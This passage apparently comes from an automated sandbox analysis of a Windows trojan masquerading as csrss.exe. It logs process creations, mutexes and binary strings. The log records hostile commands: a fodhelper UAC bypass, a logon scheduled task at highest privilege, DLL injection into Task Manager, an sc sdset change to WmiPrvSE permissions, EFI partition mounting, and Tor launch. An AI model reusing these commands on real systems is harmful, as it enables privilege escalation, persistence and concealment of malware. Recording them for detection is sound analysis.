Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\System32\fodhelper.exe Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
Source: C:\Windows\SysWOW64\mountvol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
Source: C:\Windows\SysWOW64\mountvol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
Source: C:\Windows\SysWOW64\mountvol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
Source: C:\Windows\SysWOW64\mountvol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
Source: C:\Windows\SysWOW64\shutdown.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\user\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\user\AppData\Local\Temp\csrss\tor\log.txt
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
Source: C:\Windows\rss\csrss.exe Process created: C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe -bind-address 127.0.0.1:31466
Source: C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32
Source: C:\Users\user\Desktop\kdsyitkxmS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xnlrizwa.4cp.ps1
Source: classification engine Classification label: mal100.rans.troj.evad.winEXE@111/94@10/15
Source: C:\Windows\System32\cmd.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5316:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:680:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8556:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:680:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8896:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8644:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5480:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9116:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9208:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1448:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8556:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4808:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2900:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8644:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5316:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:304:WilStaging_02
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\qtxp9g8w
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4164:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3308:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8312:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9208:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8296:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3308:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8856:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4808:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8856:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3504:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9052:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8896:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9116:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5480:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8296:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6076:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3560:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1448:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2900:120:WilError_03
Source: C:\Windows\rss\csrss.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\h48yorbq6rm87zot
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3504:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3560:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4164:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6076:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9052:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8312:120:WilError_03
Source: csrss.exe String found in binary or memory: C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe -bind-address 127.0.0.1:31466
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: kdsyitkxmS.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: C:\Windows\System32\fodhelper.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Outlook\Capabilities\UrlAssociations
Source: C:\Windows\rss\csrss.exe Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Uninstaller
Source: kdsyitkxmS.exe Static file information: File size 4379008 > 1048576
Source: kdsyitkxmS.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x40b400
Source: kdsyitkxmS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: kdsyitkxmS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: kdsyitkxmS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: kdsyitkxmS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: kdsyitkxmS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: kdsyitkxmS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Binary string: System.Data.pdb source: powershell.exe, 00000035.00000002.209088197993.000000006BC32000.00000020.00000001.01000000.00000012.sdmp
Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: symsrv.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000004308000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000004328000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004578000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004578000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004578000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000035.00000002.209062092812.000000006B23F000.00000020.00000001.01000000.00000018.sdmp
Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Core.ni.pdb source: powershell.exe, 00000035.00000002.209224649761.0000000071891000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Numerics.ni.pdb source: powershell.exe, 00000035.00000002.209181323602.00000000704F7000.00000020.00000001.01000000.00000011.sdmp
Source: Binary string: System.Transactions.ni.pdbRSDSc source: powershell.exe, 00000035.00000002.209083403499.000000006B516000.00000020.00000001.01000000.00000015.sdmp
Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Management.ni.pdbRSDSJ< source: powershell.exe, 00000035.00000002.209104723961.000000006C4B0000.00000020.00000001.01000000.0000000E.sdmp
Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: symsrv.pdbGCTL source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000004308000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000004328000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004578000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004578000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004578000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: EfiGuardDxe.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: powershell.exe, 00000035.00000002.209062092812.000000006B23F000.00000020.00000001.01000000.00000018.sdmp
Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dbghelp.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dbghelp.pdbGCTL source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Loader.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: powershell.exe, 00000035.00000002.209085027998.000000006B5CD000.00000020.00000001.01000000.00000014.sdmp
Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
